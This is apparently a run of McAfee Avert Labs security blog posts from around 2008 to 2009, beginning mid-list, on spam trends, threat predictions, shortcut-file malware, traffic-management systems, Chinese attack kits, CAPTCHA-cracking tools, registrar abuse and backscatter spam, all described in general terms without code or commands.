• An Increase in Localized Phishing Campaigns. Online scammers will increasingly target specific communities, especially on college campuses, where professional-looking emails claiming to be associated with the school’s financial or scholarship department will be blasted to all the students at the school. This is a significant danger to people who are just becoming responsible for their own finances.

• More Scams Involving Home Businesses. “Legitimate” home business scams generally involve either a pay-up-front and do-it-yourself kit, or a pay-to-play shell game of training and certification. We’ll see more of it on television, and the same infrastructure that supports diploma spam and confidence fraud will adjust to the new unemployment reality and will offer people some new bait on the old check-cashing scam.

• Increase in Forging and Abuse of Free Email Services. The free email services have started to allow accounts to send mails with arbitrary “from” addresses. This has increased the usability of these services significantly to businesses, but has also increased the “abusability” by spammers.

• McColo: The Effects of a Takedown. Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we expect to see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN.

• New Businesses to Replace Lost McColo Hosting. Hosting companies will be set up in countries that are eager to embrace a burgeoning Internet market and will offer services to replace the disrupted command and control centers formerly hosted by McColo. These may be used as pawns by entities that perceive strategic value in sculpting the battlefield of the future.

In conclusion, McAfee recommends that you keep your security software up to date, implement layered defenses, and educate yourself on the trends of the day. Download our February Spam Report and 2009 Threat Predictions to read further and in more depth on these trends and issues. Remember: The cybercriminals read the same news that we do.

Malware continues to increase at a rapid rate. With the DAT-5516 release, scheduled for 4 February, the number of drivers in the DATs will pass 500,000. Half a million is a huge amount. I remember my first antivirus program, back in the ’80s, that had a count of about 80. I don’t recall the exact number, but it’s easy to place it into perspective. We add way more on a daily basis now.

However, our current count is not an absolute number of detected malware files; this can confuse many people. Drivers can be written very specifically, say one driver for one sample, but that’s not very effective. Most drivers are written to generically detect many samples. For example, one driver can detect 50 or as many as thousands of malware files. Therefore, the number of detected malware files is way higher then the half-million number reflected in the DATs. For another look at the complexity of counting malware detections, please see François Paget’s blog as well.

Initially VirusScan would focus just on true self-replicating viruses, mainly 8-bit (.com/.exe), MS-DOS viruses as well as boot viruses, which were prevalent then–and some still are today. Malware has evolved into many areas including, but not limited to, VBA, VBScript, JavaScript, 32-bit (pe-type .exe binaries) mass-mailers, 32-bit file infectors, mobile malware, adware and password stealers, and others. Nowadays the majority of malware is static Trojans.

There has also been a big shift by the malware authors. The first malware authors were hobbyists, writing to to prove it could be done, but today we mainly see malware that’s going after the money–password stealers, etc. Malware is often developed in professional environments, much like a business project with a plan.

Although there is malware for operating systems such as Mac OSX and the various Linux/Unix versions, most malware is still targeted at Microsoft Windows and its applications.

China’s use of zombies for spam is down, but the country now leads the United States in McAfee’s February Spam Report, available here for download.

The United States has long been the leading supplier of spam, but with the overall amount of spam decreasing, China is catching up. It’s not clear what China is doing, but the vast amount of computers that have been controlled by zombies are no longer being used for that purpose. One certainly has to wonder what they are being used for.

Additionally, in Switzerland (owner of the .ch domain), we have seen a big increase in the amount of spam offering “cheap” software.

Clearly, money and profit are still the driving forces for malware and spam these days.

Shortcuts, or LNK files, are small binary files which have the path to an applications, sometimes with optional parameters. These files are used for running applications and are placed on folders where they are easy to access by users on such places as Desktops, and Application Launchers. The LNK files are also placed within the Startup folder to run automatically upon system boot. This indirect way of running applications is often attractive to malware authors as shortcuts have not been called out to most user’s attention for the sake of security as much as executable files have. At Avert Labs, we have recently seen some malware abusing shortcut files to launch malicious files/scripts in several different ways. Here, we introduce some methods we have recently seen:

1. Create shortcut files linking to malware files

This is an easy way to launch malware by a user’s actions or upon system reboot. These LNK files are created on the desktop, network shares, and even startup folders. One of the many variants of the Spy-Agent.bw trojan are known to take advantage of shortcuts to run.

2. Parasitic Infection to shortcuts

We have seen the W32/Mokaksu virus modify all LNK files on the desktop and add the path of the malware file to the original path.



The example above is the shortcut to Adobe Acrobat Reader infected with malware. The path to the malicious “Config.Msi.exe” (in the red box) is added before the original path “AcroRd32.exe” (in the yellow box). In the shortcut, the original path is treated as a parameter to the malware file. Upon clicking on the shortcut, the W32/Mokaksu malware runs as well as executing the original file, all while running in the background. Ultimately users only see the application which was associated with the shortcut launch, thereby making it much harder for users to notice the infection.

3. Scripts in the shortcuts

Shortcuts can often contain scripts for “cmd.exe” instead of linking to executable trojan files. The Downloader-BMF trojan is such a case.



When users click on these LNK files, the scripts silently creates and drops ftp scripts to then download vbs scripts from the ftp severs. The downloaded vbs scripts are then responsible for downloading trojan files.

In the first 2 cases, shortcuts are just ways of launching malware whereas in the last case, these LNK files are standalone malicious files in which no other malicious executable files are needed but a legit “cmd.exe”. This type of LNK files can be attached to emails or hosted on the web sites. This implies that we need to be more careful with LNK files. Users can easily check shortcuts by browsing the file property or viewing the file with a binary editor.

If you find suspicious strings, please do not run the files but rather send the files to Avert for further research.

It’s been a week since we’ve seen the new Mac malware, the iWork09 Trojan, which is disguised as pirated software. Since then there have been several reports about new Mac Trojans.

Before this we saw mostly lame malware for Mac OSX, but the iWork09 Trojan represents a new element to Mac Trojans — sophistication. This one contains peer to peer-like characteristics and even encrypts its traffic. It has also been associated with some recent distributed denial-of-service attacks.

One thing to remember when dealing with pirated software is that you might have a high price to pay, in this case ending up a Trojan that turns your computer into a zombie. We have seen this happen for years with Microsoft products and even with AV products. (If you search for “McAfee” on torrents sites, you will find a lot with serial numbers; but you won’t know whether the thing is a Trojan version.) Now this unfortunate trend has arrived on the Mac platform, with several reports of Trojan versions of pirated Mac applications.

Take care — you often get what you pay for.

Today, we at McAfee Avert Labs released our 2009 Threat Predictions. Amongst the findings are:

Threats Hide in the Cloud
Miscreants have also transitioned to the Internet “cloud” as their main delivery vehicle and take advantage of the attractions of Web 2.0. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional vectors of malware distribution.

Personalized Threats Speak Your Language
Threats will continue to take evasive action against security measures. One example is the existence of single-use binary files, which are an attacker’s equivalent of a single-use credit card number used by consumers when shopping online. These binaries help to create a vast sea of threats, which will make it harder for victims to describe their assailants, and make it harder for defenders to catch them. Additionally, McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

Malware Targets Consumer Devices
McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

The Rogue Web and Malvertising
Last year McAfee also saw the malware underground use mainstream practices in an effort to “sell” software that was either misleading or outright fraudulent. McAfee expects this trend to continue as cybercriminals still see a lucrative market in this area.

McColo: The Effects of a Takedown
Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we will see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN. Together, these organizations will shine the public light on these malicious actors and shut down their access to network and systems infrastructure.

Download the full report from our whitepaper page here.

In less than four days the inauguration of President-Elect Barack Obama will make headlines. At McAfee, we expect cybercriminals to use this event to conduct their typical attacks like they do when the news gives them such opportunity.

Unfortunately, we were right and some sites have already started to circulate fake information on this subject to lure in the crowds in an attempt to infect their computers. Here is one of them we recently discovered. As you can see for yourself this author does not hesitate to make use of sensationalism:

Let me add that if you are lured into this trap and are using an incorrectly protected PC that you will be infected by malware we detect as W32/Waledac.gen.b.

This website was not created by a joker. It is very professionally done. It is protected by a botnet bringing into play the fast-flux technique I have explained here and here.

Once again, be vigilant and do not unwisely follow a link you may have received via email or find upon a search!

Today we at McAfee Avert Labs released the first of our new monthly publications: the “McAfee January Spam Report.”

Within its pages you will find excellent information on current spam trends, campaigns, and maybe even some “winners and losers.” Some of the highlights of the January issue include:

Political Spam
Tax Relief Junk Mail
Unemployment and Diploma Spam Increases
Christmas E-Cards

As well as some 2009 spam predictions! Definitely worth the download and read. Watch for our February issue in about four weeks. All spam reports, as well as other white papers, are available from our whitepaper download area here.

The Web’s classical social-engineering trick of the “missing video codec” tries to lure people into clicking on links or download and install an executable which pretends to be the missing application which is needed in order to watch the movie. The animated picture below is such an example: at first glance, it looks like a typically embedded video which is unable to load. The “picture” states that you’d have to click on it in order to see the movie. And here the lure begins - in this blog entry, we’ll follow it down and outline what kind of traffic management backbones are deployed for malware campaigns nowadays.

In our example the animated image is hosted on a popular blog platform and the link points to a suspicious Flash sample. As a quick analysis reveals, the Flash is compressed and additionally contains some obfuscated JavaScript code to hide its real intention. The script code redirects to another location.

The new location points to a so-called “Traffic Management System”. In this case, if you load the URL several times, the destination rotates and after too many retries you will be always redirected to the homepage of Google. The system remembers your IP address on the server-side for a certain time period. After that time, or when you just use another IP address, you will again see the redirections when visiting the URL.

The redirections are based on a typical HTTP “302 Found” response with a new location from the server where the traffic management system is installed. Another example, which also used Geo-Location, was outlined in this Avert Labs Blog post where a downloader trojan contacted such a system and based on the country, different malware binaries were downloaded.

Such traffic management systems nowadays are configured via web-based administration interfaces. Typically the links for the “incoming traffic” look like http://www.example.com/in.cgi?three or http://www.example.com/in.cgi?default where “three” or “default” stands for different campaign IDs inside the system. A typical rule could look like shown in the following picture.

The administrator is able to define rules for “incoming traffic” which results in different “outgoing traffic” based on different restrictions. For example, the Geo-Location could be used to redirect visitors from a particular country to one location while visitors from another country will be redirected to a different location - just think of localized campaigns targeted to the spoken language in these countries. So users from the United States will not be redirected to a french phishing web site and vice versa.

These traffic management systems can also use more complex rules based on network ranges and the referrer - so lets say that only visitors with a referer from Google will be redirected to a malicious web site as long as the IP address of the visitor doesn’t come from well-known network ranges belonging to security companies.

Why do that? This way, only users searching for the website will get to the malicious redirect, while the websites’ owner or administrator, who usually does not search for it but directly enters the URL into the browser, will see the normal website with no oddities. This helps the attacker to keep the infection under the radar for a longer time.

Other trafic management systems, like shown in the above picture, also feature different logins into the web interface - for the administrator, the “sellers” and the “buyers”. This particular system has different views for sellers of traffic - that is, infected web sites containing an IFRAME that points to the trafic management system -, and buyers of traffic - e.g. the people who run exploit servers and try to install malware on unpatched computers, thus looking for potential victims. Such traffic management systems can be in between the infected web sites and the exploit servers. As you can see in the above picture also payment options can be configured, so the more traffic a seller redirects to a buyer, the more money is paid. With such systems in between, the campaigns can be easily exchanged or the “traffic” can be sold to new buyers which try to install their malware.

So the classical starter, the “missing video codec” trick, can end up in quite a complex system managing modern malware campaigns. Visiting or following a malicious ressource nowadays means that you are redirected based on a complex server-side management system.

Today marks another day of momentous change for McAfee’s research teams.

I just spent two days with my new colleagues from Secure Computing and some of my team members from McAfee Avert Labs. It was two grueling days of discussion and education as we both came up to speed on our research methodologies and technologies. Let me say that I am truly excited to be working with Dmitri Alperovitch, Sven Krasser, and Paula Greve, who head up the research group there. These are sharp and capable research leaders who have done amazing things. TrustedSource is a great technology and has so many applications that McAfee can leverage. Once our new Artemis technology begins to leverage TrustedSource capabilities McAfee will become the undisputed leader in security intelligence in the Internet “cloud.” Together we will see millions of spam messages, evaluate thousands of web sites, and see thousands of new pieces of malware–all in the span of 24 hours. We now have the ability to see and react to the threat landscape better than ever before. This is something that every McAfee product, technology, appliance, and SAAS (software as a service) solution will come to leverage, differentiating themselves from the competition even more.

At first we thought we would have overlapping technologies, but this is definitely not the case. In combating spam, web, and malware we have approached these threats from very different directions; thus we find our technologies very complementary. In the case of anti-spam protection, for example, we have two technologies that provide better than 99% detection using very different methodologies and approaches. Once combined, we will have the most robust solution on the market. The same holds true for the SmartFilter and SiteAdvisor technologies, as well as our malware solutions.

Today we have very good security intelligence. Tomorrow, with a bit of nurturing, we will have great security intelligence.

We welcome Secure Computing to the McAfee research family.

Jeff Green
Senior Vice President
McAfee Avert labs

Probably the most widely reported topic in the Chinese Security community this month will be the availability of a commercial MS08-067 attack pack, customized for Chinese users. On October 26th, 2008, exploit code was posted on to a well-known public repository site. In a few days, malware kit author, WolfTeeth, was quick to sell a MS08-067 port scanning tool with attack capability to his “customers”, using free code from the Internet.

Taking a peek into his “malware shop”, one finds a series of malware kits for sale - including a BackDoor kit (a.k.a. Beetle Remote Control Kit). It offers features similar to BackDoor-AWQ, another commercial kit that was also notoriously sold on a Chinese website. Both kits offers a free version, and a commercial version with enhanced features including:

• Kernel rootkit.
• Anti-virus software termination.
• Weekly anti-virus detection monitoring and evasion service.
• Web DDOS attack option (using a method to target webservers using expensive HTTP requests such as an active web application site).

The seller invites interested “customers” to contact him for a quote, but on another page, he has publicly priced a AdClicker trojan kit at CNY258 (~USD$37.80). This kit allows his “customers” to make money from pay-per-click sites using infected machines. Similarly, this kit claims “advanced” features to terminate popular anti-virus software in China, downloads updates and stealth capability.

Oh, wait, he also posted a disclaimer to remind all “customers” that his tools must never be used for “legal purposes” and is sold for “research use” only. For customer service, he has also warned his “customers” about “trojanized” versions of his kit distributed by others on the Internet, that will install a backdoor to spy on the backdoor user.

This malware shop is hosted on a domain registered very recently, on October 16th, 2008 to someone by the name of Wang Zeyu, possibly from Nanjing, China. Since the release of the tool, it has gained some attention from the mainstream Chinese media.

McAfee Avert Labs detects the toolkit as Exploit-MS08-067 (Generic.dx in older DATs), and the dropped exploit and port scanning tool as Exploit-MS08-067 trojan and Tool-TCP Scan application.

You may have read in the press recently about landfill ISP McColo being de-peered. Spam is just part of this story, though probably the most visual and media friendly, please don’t see this ongoing situation as mostly spam related. Spam is simply the most visible tentacle of this octopus.

Our esteemed blogmaster Ed has been moaning about getting something on the blog about it & I wanted to dig out something meaningful for our readers so I contacted a close partner of ours and got some real mailserver stats.

Quite the haircut I’m sure you’ll agree.

You can read my previous blog about bots calling home to mother-ships (often via proxies) if you’re interested as to why this had such a sudden and dramatic effect.

Enjoy the lower load averages while they last though

This is no reason to rest however, we’re still as busy as ever in the labs and we’re watching as intently as ever. The child porn sites are already on a transatlantic move for instance and we’ll be calling our colleagues at the IWF today for sure.

Issue 5 of the publication formerly known as Sage has been released. This issue we take aim and tackle the rather murky subject of social engineering. We have nine excellent articles for you from some of our finest researchers as well as two academic experts. Some of the topics covered include:

The Origins of Social Engineering
Social Engineering 2.0 - What’s Next?
Vulnerabilities in the Equities Markets
The Future of Social Networking Sites
Typosquatting - Unintended Adventures in Browsing

Many aspects of social engineering are dissected and investigated as well, some not found anywhere else! Definitely worth the download and read.

Available here.

We’ve already written about CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart), the mechanism used to protect web sites, forums, and mailing systems against the automatic creation of accounts and contents. As my colleague Tad Heppner wrote in his November 2007 post, most common CAPTCHA systems work by generating distorted characters, text, or pictures that can be easily recognized by the human brain but present significant difficulty for computer-based optical character recognition or other image-recognition systems.

It should come as no surprise, however, that spammers continue to try to crack CAPTCHA. We’ve now seen a new version of a professional spammer tool on the web. XRumer 5 sells for $520 and promises advanced CAPTCHA decoding methods.

For a long time spammers have searched to defeat CAPTCHA mechanisms to create fake email accounts to send spam. Before telling you more about this new crooked utility, let’s review some older techniques used by spammers.

As shown in the following image (source XMCO), the most common CAPTCHA methods can be broken.

The first method of cracking is manual. People from developing countries offer services. The competition is intense. On some dedicated forums, proposals surge in from Vietnam or Bangladesh. They claim that lots of people are ready to work 24 hours a day to process hundred of thousands of CAPTCHA. Rates vary from $8 to $1 per 1,000 CAPTCHA.

A less expensive solution consists in using private individuals to do the work free of charge. I am sure some readers remember this unusual offer, in which it was possible to undress “Melissa” in exchange for some CAPTCHA work. This allowed a spammer to create fake Yahoo Mail accounts.

It is also possible to find free web services. The CAPTCHA Killer web site offers such services. Its designer claims the offer “is 100% focused on increasing accessibility on the Internet” for the “1 Million Americans that suffer from blindness.” The service makes available an API to automate the process. However, I was not surprised to read a cross-reference on that site saying they have been notified that using CAPTCHA Killer with Myspace was against the latter’s Terms of Service.

A very technical approach uses rainbow tables, in which each CAPTCHA image is associated with its character string. In March 2008, someone nicknamed Maluc created PHP scripts to download, extract, and save thousands CAPTCHA images from Yahoo, Google, and Hotmail. When finished, each collection will help spammers create new recognition tables or verify the accuracy of its OCR algorithm. When successful, only one millisecond is needed to compare a new footprint with the ones included in the database. You have to pay between $1,500 and $5,000 for such algorithms, which suppress the noise, create a black-and-white picture, break it into segments (one letter per segment), and identify the character.

A programmer called Wangrun in the Chinese province of Anhui says he developed software to decode CAPTCHA systems. Depending on the complexity of the CAPTCHA image, he charges between $500 and $6,000 per decoder. No price is quoted for the most difficult images but, in a comment, he writes it is feasible. Wangrun declines to say what his customers use the decoders for, but says he has “very many” of them.

Spammers can also use zombie machines to help them crack CAPTCHA. We’ve read on the Virus Bulletin web site that compromised systems making up a large botnet were recently used to help in the registration process for Windows Live Mail accounts. When the bot (detected by VirusScan as Generix.dx) asked for registration, it received a CAPTCHA and immediately presented its image to a central server that attempted to decode it and returned the result. The decipher technique was successful only around 35 percent of the time, VB said, but a new idea was launched. The fact that large numbers of infected systems were running repeated attempts suggests a high number of new accounts for spamming were created at that time.

Finally, turnkey tools are another method for defeating CAPTCHA defenses. XRumer 5 is one of them. It can flood message and links forums, guestbooks, blogs, wikis, etc. It automatically finds and fills in required fields with no need of a browser. If the forum requires registration, the program will register, log in, and post the spammer text. XRumer goes beyond JavaScript protection, pictocode protection (typing a number displayed in a box), and protection by e-mail activation. If a CAPTCHA image is detected, the program automatically downloads it, analyzes it, and fills in the form.

Version 5 can work on most recent versions of popular engines such as VBulletin, IPB, and phpBB, according to its creator. XRumer can also create accounts on gmail.com for posting. And its clients seem happy. One of them wrote last week on a forum “all that for only $500? It’s very cheap! I’d easily charge 2k for that. Solving gmail captcha is no joke. I paid 4k just for that from an OCR developer. …”

XRumer is also able to solve the “pick the cat captchas” presented in picture below.

On October 3, XRumer’s maker explained he analyzed many forums and discovered that most of this type of CAPTCHA used identical pictures. Thus XRumer can distinguish them by their sizes in bytes. And it concludes: “It’s so easy, isn’t it? Oh, they can make some distortion on images? Well, we have a time to improve our algorithm. We analyze forums, blogs, guestbooks permanently, and there is one important thing: that type of captchas used not more than 0,01% of resources (1 of 10,000 sites).”

Once again, we are reminded that malware design is a business. And once again, my searches drive me to Russia, where criminals create and employ malicious software as well as engage in identity theft and virtual prostitution. The company or individual behind XRumer appears to be the same as that which proposed an automated sex-talk service called CyberLover.ru in 2007. One name I got from a whois request today is Alexander Ryabchenko. When the media pointed the finger at him in 2007, Ryabchenko emailed to Reuters that he could not be accused of identity theft with the CyberLover concept. He explained “the program can find no more information than the user is prepared to provide.”

If anyone should ask Ryabchenko why he commercializes XRumer, I suggest he repeat the CAPTCHA Killer web site argument: to help the million people suffering from blindness.

Inspired by Igor’s post (and whilst Terry is dancing in doorways) I’ve taken some time out from my current project and beaten a path through the tangled web of service providers, registrars, resellers and registrants of the domain name system supporting the darker side of the web.

This investigation originally started when Garth from Knujon pointed out that Directi have some shill registrars on their books (Whilst I was enjoying the Kaiser Chiefs @ Rock en Seine in Paris no less). I then read Brian Krebs post about Atrivo being one of the best known dangerous networks around… He finished with a teaser note about ESTDomains. So guessing whats coming next I’m going to jump the inter-networking gymnastics that binds EST with Atrivo/Intercage/(cernel|inhoster)/Etc, privacy services and others and start at the far end of the story and expose a secret about a not-so-little Indian company called Directi and shine a light on the almost invisible but vital service that powers the domain registration core of the largest group(s) of bad-actors on the web today.

Let me provide some bullet points about the Directi Group of companies to get you up to speed.

• Directi are a privately owned Indian company with a reported turnover in excess of $300M USD.
• Directi own LogicBoxes the maker of a product used to manage the registrar relationship with registries.
• Directi own the reseller Resellerclub.com, and the registrar Answerable.com amongst others.
• Directi own skenzo.com a domain typo squatting monetization service.
• Directi’s Logicboxes are responsible for over 3.5M domains, about 45K resellers across 50+ ICANN accredited registrars.
• LogicBoxes has no acceptable use policy (AUP) for their service.

That last point is the weak link in the chain. Directi’s Logicboxes provide domain registration automation services under contract but without an AUP, and to organizations that have an un-holy tie to organised crime at that.

LogicBoxes is a software product or turnkey ASP solution but some simple tests (that I’m deliberately withholding for now) prove that it’s software combined with a backend service and Directi are involved at every stage of the game via it’s service-layer even though it looks on the face of it like they aren’t.

(If you don’t understand the cats-cradle of knotted string that holds the domain name registration system together then blame John Levine as he has admitted it’s all his fault and this slide explains it all, “apparently” ).

So on the the murky world of Registrars also being Resellers and why:
ESTDomains, Dynamic Dolphin, to name but a few are huge Directi resellers, and as ICANN accredited registrars also customers of LogicBoxes too. But as Garths and Brian’s posts show there are also many other “shill” registrars and unanswered questions too. However between them they provide a disproportionate amount of domains that are used for illegal activities and most have a path back to Directi’s logicboxes service. I’d estimate the total to be north of 100,000 domains by now, everything from Social networking spam through illegal pharmaceutical supply to botnet command and control.

There is a metric truckload of publicly available evidence for anyone that still doubts the darkness of their hats take a look at the URIBL listings for the last 5 days for ESTdomains. All the linked domains are sites you do not want to click as they contain spam landing pages, fake anti-mailware, porn with fake codecs amongst other things. Why on earth a legitimate registrar would not monitor uribl’s published information and act on it is completely beyond me.

ICANN don’t help the situation by accrediting registrars without a verifiable legitimate address and well publicized & working contacts. We have procurement and vendor qualification processes that’s a real pain some times excellent IMHO, I’ll ask someone to send them a copy

Our friends at Spamhaus have plenty to say about ESTDomains too on many listings, take a look at their nameserver listings for starters SBL53320 SBL53319. Searching ROKSO will reveal a whole lot more. As for Atrivo, it’s a rats nest of issues; A rats nest that would do well to fall off the internet. For more information on the internet-gymnastics I jumped over take a look at this great pdf from hostexploit.com. Keep in mind though that some of the feeder transit networks may be owned or run by the same gang and just exist for redundancy.

The ESTDomains that I’ve investigated first hand have generally fallen into two camps, one where they are registrar directly and one where PublicDomainRegistry is mentioned in the whois, the latter being the “shill” sorry I mean “white labeled Registrar” for the previously mentioned Directi company “resellerclub dot com“. The fact that PrivacyProtect.org is Directi’s whois privacy service (pasted from here) for resellers just makes matters worse.

Don’t get me wrong, Directi have a clue, register a domain directly with a Directi owned registrar and break the AUP and they will act well as any registrar must. I’m specifically talking about the other services they provide to the criminal corners of the web.

It would appear too that the ESTDomains portfolio has had their privacy protection revoked too, this is definitely a step in the right direction. (Breaking news this evening from El Reg and knujon, nice work guys) However, these guys move pretty fast and recently EST moved their privacy needs to their own protectdetails.com domain.

So finally I have to ask those making money by providing the core services Bhavin Turakhia & Divyank Turakhia from Directi, you clearly know the score, so when will you completely stop supporting the illegal acts of EST, DD and other very obvious darkside entities and kick the bad apples out?

Before anyone from a registry or registrar starts the classic “Smith & Wesson” rant think about this, “Smith and Wesson” don’t sell maps or cars, drive you to the forest, apply your camouflage, help with your ICANN accreditation or load your gun for you

On July 1 we released the results of our S.P.A.M (Spammed Persistently All Month) Experiment, in which 50 people from around the world surfed the Web unprotected for 30 days. By taking part in the experiment, participants were given permission to go where most Internet users would not dare, in order to discover how much spam they would attract and what the effects would be. Go everywhere we have told you not to go. Click everything we told you not to click. We then studied the daily blogs and analyzed the spam itself and confirmed that spammers are as active as ever; they are increasingly using psychological tricks to lure Internet users to part with their contact details, identity information and cash. The experiment (the first of its kind) clearly shows that spam continues to evolve, utilizing more local languages and cultural nuances, as well as becoming much more targeted in a bid to avoid detection.

Our brave and bold participants were assembled from 10 countries and by the end of the 30 days they received more than 104,000 spam emails–that’s an average of 2,096 messages each, the equivalent of approximately 70 messages a day.

Many of the spam messages received were phishing emails: emails that pose as a trustworthy source to criminally acquire sensitive information such as usernames, passwords, and bank account details. Other emails carried viruses, and many allowed malware to be silently installed on the computers by persuading participants to surf unsafe web sites. A number of participants noted a decrease in their computer’s processing speed, as well as an increased number of pop-ups.

The Global ‘Spam League’:

1. United States 23233
2. Brazil 15856
3. Italy 15610
4. Mexico 12229
5. United Kingdom 11965
6. Australia 9214
7. The Netherlands 6378
8. Spain 5419
9. France 2597
10. Germany 2331

To read more about the participants experiences, go here
and make sure you download the ‘Global Spam Diaries’ as well.

There mustn’t be much going on in the world today as the Nuwar spammers have moved from jumping on real news of natural disasters and current affairs to creating their own fictional events! This high volume spam campaign is using some wacky subjects to lure people into clicking on the links:

Subject: Britney found hanged in locker room
Subject: White House hit by lightning, catches fire
Subject: Oprah found sleeping the streets
Subject: Eiffel Tower damaged by massive earthquake
Subject: Donald Trump missing, feared kidnapped
Subject: Lastest! Obama quits presidential race

This clever social engineering technique plays on peoples inquisitiveness in news of natural disasters and celebrities. The emails also follow the simple format of some text and a link that looks fairly harmless to the uneducated user.

All the links go to a fake pornotube page hosted on legitimate sites that have been hacked. If you click on the video (that’s actually just an image) it tries to download a .exe file. This is detected as BackDoor-DNM and the spam is also currently detected with our Anti-Spam products.

So it goes without saying.. NEVER click on links in an email unless you are sure of its origin, keep your Anti-Virus software up-to-date and if you have a website make sure its properly secured so you’re not hosting stuff like this.

Nuwar families are known for using social engineering to trick users to download themselves. As we mentioned in the blog last month, the topic of the earthquake in China has been used by malware authors for social engineering for weeks. This time, the most recent variant of Nuwar circulates a fake topic - Beijing earthquake (Not Sichuan earthquake!).

If users click on the fake video image, the file “beijin.exe” (W32/Nuwar@MM) is downloaded. However, users might be infected with Nuwar even if they don’t click it. This page has the iframe link to a malicious javascript.

Upon accessing the above page, the obfuscated javascript is downloaded and run because of the injected iframe. The JavaScript exploits the realplayer vulnerability CVE-2008-1309 and download another variant of Nuwar.
McAfee VSE blocks the script and detect as “JS/Exploit-Shell.gen”.

At the time of writing, the download file was corrupted.

This week in Paris, a friend asked me how the anti-virus situation was going and how we will be able to face up to the unexpected increase in malware number. “In a day, one of your competitors announces more than 1.7 million new detections. Its total detection jumped from 74,000 to 1,800,000! If this keep this up, the level of 2 million viruses will be overtook rapidly”, he said. Humorously, the man I was talking to concluded: “and you [McAfee], you still detect less than 400,000 threats?”

Counting malware can be quite a tricky business. At McAfee, and with each anti-virus definitions for VirusScan, we announce how many threats we are detecting with each new DAT release. This figure, however, is a *family* count. Yesterday (June 17th, 2008), the clock said 407125.

In September 2004 with DAT release 4391we reached 100,000 threats detected. With the 4800 release on May 2006 the number of threats detected reached 200,104 detections. This figure doubled in 2 years, and the situation could be analyzed as follow:

To explain how it was possible to pass from 74,000 to 400,000 or to 1,800,000 malware, I informed my friend we had to take into consideration AV researchers “zoos” - in other words: “collections” – consisting of several million malware samples (sometimes we use the term “unique samples”) collected each day.  I explained to him we had, roughly, in our high-security servers, 10,000,000 files:

• classified by family
• often with a vast number of variants
• sometimes with multiple infected files from a single malware variant (when it is parasitic or polymorphic), or when malware authors configure their threats to serve a binary-unique version with each download. In that case, some zoos contain 1 or 2 *versions* while others will have 10,000 and others still 100,000!!
• without forgetting the terrific “miscellaneous” subfolder for files that we cannot pigeonhole

Of course, I said almost all were detected and consequently all these prediction numbers were not gospel truth. I added they were only useful to establish a long-term trend on condition that their computation complies with a single rule as time goes by.

To end my demonstration I searched for real figures. Firstly I fell on AV-test.org statistics. On their site, they explain they manage 60 terabytes of testing data, including several million malware samples and clean files. They tests malware on all important desktop and server platforms, including all currently supported versions of Windows, Linux, Solaris, Unix, Lotus Domino/Notes and MS Exchange. Having just recently received from Germany some figures summarizing their malware collection items, I precisely heard of the size of their collection which exceeded 11 million unique samples (11,002,741 in April 2008).

Strengthened by this number, I was pretty sure we had - at McAfee - the same volume including parasitic and polymorphic malware for which we had to own multiple samples. I asked for a confirmation and received some figures I entered in this other chart:

While I wrote this blog entry, I imagined the reader surprise: in 3 months (from January 31 to April 30) collections increased by 2,880,000 million samples (at McAfee) and by 1,700,000 million samples (at AV-test.org); an average of 760,000 new files each month… This is true, and it is why we constantly work on new technologies to answer this challenge.

To conclude this blog entry, I propose to you the following……. It demonstrates that it is possible to announce that we detected, at the end of 2007, “between 357,820 (DAT-5196) and 8,600,000 pieces of malware”. And I predict we will detect at the end of 2008 between 450,000 and 22,000,000 malware”. OK, I joke a bit, but I also want to demonstrate there are many manners to count malware and you must not judge a product only by the announced number of detections.

NDR Spam a.k.a. Backscatter has been around for years but has only recently hit the radar as a major spam issue mainly due to the rise of the botnet and spammers desperation to get messages through to the end user.

What is an NDR?
NDR short for Non Delivery Receipt is an automated email sent by an MTA that informs the sender there has been a problem with the delivery of the message they have sent.

NDRs are also referred to as Delivery Status Notifications (DSN) or simply bounce messages.

So what is NDR Spam?
NDR Spam occurs when spammers fake your email address in the From field when sending their spam. If the intended recipient of the spam does not exist or has no space left in their inbox etc. then you’ll receive a Non Delivery Receipt for an email you never actually sent.

Also contributing to this problem is Challenge/Response spam filtering services, Out Of Office notifications, List auto replies and any other auto-responder type email.

Why has it become a problem?
Spammers are constantly looking for ways to evade anti-spam filters. The recent sharp rise in NDR spam suggests that rather than just having some bad email addresses on their lists that bounce, they have started to target email addresses that bounce in order to get their spam content through to your inbox. They can do this by using totally random email addresses but with a legitimate domain that is destined to bounce or they can compile lists of email addresses that bounce when spammed. It’s even possible the spammers are targeting domains that they know return bounces with the full message attached. Basically the spammer wants to relay his spam via a legitimate mail server to get it in your inbox even if it doesn’t look pretty.

How big is the problem?
NDR spam is currently about 2% of all spam that’s down from over 4% a couple of weeks ago. It’s possible this method hasn’t been effective enough for the spammers. We believe that over 50% of these bounces are coming from the one botnet alone. NDR spam can be broken down into three main categories, an NDR with the full message attached, an NDR with only the spammy headers attached or an NDR with no spam content at all.

Detecting NDR Spam
There are several problems associated with detecting this particular type of spam.

The good news…

Reducing Outbound NDR Spam
Reducing the amount of NDRs sent by your server would also help this situation with the added benefit of reducing the load on your server.

There are two types of bounce synchronous and asynchronous. Synchronous bouncing occurs when the remote mail server rejects the message during the SMTP conversation. This helps reduce load on your server by preventing it having to send an NDR. Unfortunately this can open your server up to dictionary attacks but there are solutions to that issue such as tar pitting. An asynchronous bounce happens when the remote mail server accepts the message and later decides there is a problem with delivery so it returns it by sending an NDR to the return path of the message. I would recommend using synchronous bouncing if it is a feature of your mail server.

We could suggest that all responsible Administrators should leave the Original message in their NDRs making it much easier to identify and block these messages with existing anti-spam technologies but on the flip-side if no NDR messages had the spam content in them then it wouldn’t be worth the spammers while sending them. Each approach has its advantages and disadvantages.

